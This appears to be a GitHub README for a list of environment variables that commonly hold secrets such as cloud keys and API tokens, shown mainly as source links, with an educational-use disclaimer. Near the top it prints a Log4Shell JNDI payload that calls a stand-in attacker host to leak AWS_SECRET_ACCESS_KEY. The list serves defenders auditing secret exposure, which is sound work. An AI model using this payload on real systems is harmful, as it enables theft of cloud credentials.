🦄🔒 Awesome list of secrets in environment variables 🖥️
List of secrets, passwords, API keys, tokens stored inside a system environment variables.
An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.
Many developer documentations recommends storing secrets inside an environment variable, but is it the best way to keep secrets?
The attacker can read values inside system environment variable by using exploits:
CVE-2021-44228 JNDI log4j (JAVA) (Read more...)
${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
Get AWS_SECRET_ACCESS_KEY or return NO_EXISTS
CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on Github and Twitter 😉
and much more...
Because of that I created, a list of secrets in environment variables to help secure software.
Some of practices to avoid leak of secrets stored in environment variables is to:
You can check your system environment variables:
dir env:
printenv
or env
source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html
source: https://www.algolia.com/doc/framework-integration/symfony/getting-started/installation/?client=php
source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet
source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406
source: https://algotrading101.com/learn/binance-python-api-guide/
source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md
source: https://cli.cloudfoundry.org/en-US/v6/auth.html
source: https://docs.codeclimate.com/docs/command-line-interface
source: https://docs.coveralls.io/supported-ci-services
source: https://circleci.com/docs/2.0/api-developers-guide/
source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean
source: https://github.com/marketplace/actions/publish-docker
source: https://circleci.com/docs/2.0/env-vars/
source: https://github.com/phatblat/fastlane-variables
source: https://firebase.google.com/docs/cli
source: https://docs.fossa.com/docs/api-reference
source: https://cli.github.com/manual/gh_help_environment
source: https://docs.gitlab.com/ee/user/project/deploy_tokens/
source: https://cloud.google.com/docs/authentication/getting-started#windows
source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html
source: https://devcenter.heroku.com/articles/authentication
source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/
https://docs.mongodb.com/mongocli/stable/configure/environment-variables/
source: -
source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow
source: https://developer.okta.com/okta-sdk-java/apidocs/com/okta/sdk/client/ClientBuilder.html
source: https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html
source: https://docs.oracle.com/cd/E78305_01/E78304/html/openstack-envars.html
source: https://docs.percy.io/docs/environment-variables
source: https://www.postgresql.org/docs/current/libpq-envars.html
source: https://docs.saucelabs.com/basics/environment-variables/
source: https://docs.sentry.io/product/cli/configuration/
source: https://slack.dev/node-slack-sdk/getting-started
source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme
source: https://stripe.com/docs/cli/api_keys
source: https://surge.sh/help/integrating-with-circleci
Source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html
source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices
source: https://docs.travis-ci.com/user/environment-variables
source: https://www.vaultproject.io/docs/commands
source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops
The repository includes the raw list:
It is auto-generated from README.md by GitHub action.
👍🎉 First off, thanks for taking the time to contribute! 🎉👍
If you would like to add more secrets:
Please read and follow our Contributing guide
Thanks! 🦄
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.